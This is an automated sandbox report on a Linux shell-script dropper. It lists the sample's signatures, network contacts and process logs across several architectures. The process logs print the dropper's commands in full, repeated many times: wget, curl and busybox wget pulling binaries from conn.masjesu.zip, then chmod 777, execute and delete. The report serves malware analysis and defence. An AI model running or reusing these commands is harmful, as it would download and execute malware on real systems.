Malware Analysis Report

2024-12-07 16:29

Sample ID 241114-bdcegsvrhj
Target 241b501a94451175bc2313a093f82590.bin
SHA256 a29d13a3030627b861579097a9c97b2b78a817d89e05988ae8b12320d376ecc6
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

a29d13a3030627b861579097a9c97b2b78a817d89e05988ae8b12320d376ecc6

Threat Level: Shows suspicious behavior

The file 241b501a94451175bc2313a093f82590.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 01:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 01:01

Reported

2024-11-14 01:03

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

132s

Command Line

[/tmp/c72566effcf8e8f78e34277ced9f0394f5385a070dae6ae2155d3a0d8b9a5694.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/c72566effcf8e8f78e34277ced9f0394f5385a070dae6ae2155d3a0d8b9a5694.sh

[/tmp/c72566effcf8e8f78e34277ced9f0394f5385a070dae6ae2155d3a0d8b9a5694.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.1.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 01:01

Reported

2024-11-14 01:03

Platform

debian9-armhf-20240611-en

Max time kernel

148s

Max time network

2s

Command Line

[/tmp/c72566effcf8e8f78e34277ced9f0394f5385a070dae6ae2155d3a0d8b9a5694.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/c72566effcf8e8f78e34277ced9f0394f5385a070dae6ae2155d3a0d8b9a5694.sh

[/tmp/c72566effcf8e8f78e34277ced9f0394f5385a070dae6ae2155d3a0d8b9a5694.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-14 01:01

Reported

2024-11-14 01:03

Platform

debian9-mipsbe-20240418-en

Max time kernel

88s

Max time network

90s

Command Line

[/tmp/c72566effcf8e8f78e34277ced9f0394f5385a070dae6ae2155d3a0d8b9a5694.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj /tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj N/A
N/A /tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt /tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt N/A
N/A /tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ /tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ N/A
N/A /tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA /tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA N/A
N/A /tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2 /tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2 N/A
N/A /tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D /tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D N/A
N/A /tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9 /tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9 N/A
N/A /tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I /tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I N/A
N/A /tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH /tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH N/A
N/A /tmp/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc /tmp/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc N/A
N/A /tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1 /tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1 N/A
N/A /tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs /tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs N/A
N/A /tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY /tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY N/A
N/A /tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y /tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y N/A
N/A /tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs /tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs N/A
N/A /tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY /tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY N/A
N/A /tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y /tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y N/A
N/A /tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1 /tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1 N/A
N/A /tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj /tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj N/A
N/A /tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt /tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt N/A
N/A /tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ /tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ N/A
N/A /tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D /tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D N/A
N/A /tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9 /tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9 N/A
N/A /tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I /tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I N/A
N/A /tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA /tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA N/A
N/A /tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2 /tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2 N/A
N/A /tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH /tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH N/A
N/A /tmp/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc /tmp/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1 /usr/bin/curl N/A
File opened for modification /tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY /usr/bin/curl N/A
File opened for modification /tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ /usr/bin/curl N/A
File opened for modification /tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH /usr/bin/curl N/A
File opened for modification /tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA /usr/bin/curl N/A
File opened for modification /tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2 /usr/bin/curl N/A
File opened for modification /tmp/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc /usr/bin/curl N/A
File opened for modification /tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ /usr/bin/curl N/A
File opened for modification /tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2 /usr/bin/curl N/A
File opened for modification /tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D /usr/bin/curl N/A
File opened for modification /tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA /usr/bin/curl N/A
File opened for modification /tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9 /usr/bin/curl N/A
File opened for modification /tmp/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc /usr/bin/curl N/A
File opened for modification /tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs /usr/bin/curl N/A
File opened for modification /tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY /usr/bin/curl N/A
File opened for modification /tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs /usr/bin/curl N/A
File opened for modification /tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj /usr/bin/curl N/A
File opened for modification /tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt /usr/bin/curl N/A
File opened for modification /tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D /usr/bin/curl N/A
File opened for modification /tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I /usr/bin/curl N/A
File opened for modification /tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj /usr/bin/curl N/A
File opened for modification /tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt /usr/bin/curl N/A
File opened for modification /tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9 /usr/bin/curl N/A
File opened for modification /tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y /usr/bin/curl N/A
File opened for modification /tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I /usr/bin/curl N/A
File opened for modification /tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH /usr/bin/curl N/A
File opened for modification /tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y /usr/bin/curl N/A
File opened for modification /tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1 /usr/bin/curl N/A

Processes

/tmp/c72566effcf8e8f78e34277ced9f0394f5385a070dae6ae2155d3a0d8b9a5694.sh

[/tmp/c72566effcf8e8f78e34277ced9f0394f5385a070dae6ae2155d3a0d8b9a5694.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/bin/chmod

[chmod 777 FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj

[./FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/bin/rm

[rm FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/bin/chmod

[chmod 777 bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt

[./bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/bin/rm

[rm bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/bin/chmod

[chmod 777 hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ

[./hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/bin/rm

[rm hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/bin/chmod

[chmod 777 ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA

[./ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/bin/rm

[rm ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/bin/chmod

[chmod 777 kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2

[./kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/bin/rm

[rm kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/bin/chmod

[chmod 777 rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D

[./rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/bin/rm

[rm rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/bin/chmod

[chmod 777 RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9

[./RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/bin/rm

[rm RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/bin/chmod

[chmod 777 3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I

[./3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/bin/rm

[rm 3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/bin/chmod

[chmod 777 aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH

[./aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/bin/rm

[rm aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/bin/chmod

[chmod 777 4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/tmp/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc

[./4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/bin/rm

[rm 4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/bin/chmod

[chmod 777 fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1

[./fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/bin/rm

[rm fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/bin/chmod

[chmod 777 D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs

[./D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/bin/rm

[rm D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/bin/chmod

[chmod 777 7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY

[./7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/bin/rm

[rm 7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/bin/chmod

[chmod 777 sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y

[./sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/bin/rm

[rm sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/bin/chmod

[chmod 777 D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs

[./D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/bin/rm

[rm D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/bin/chmod

[chmod 777 7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY

[./7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/bin/rm

[rm 7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/bin/chmod

[chmod 777 sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

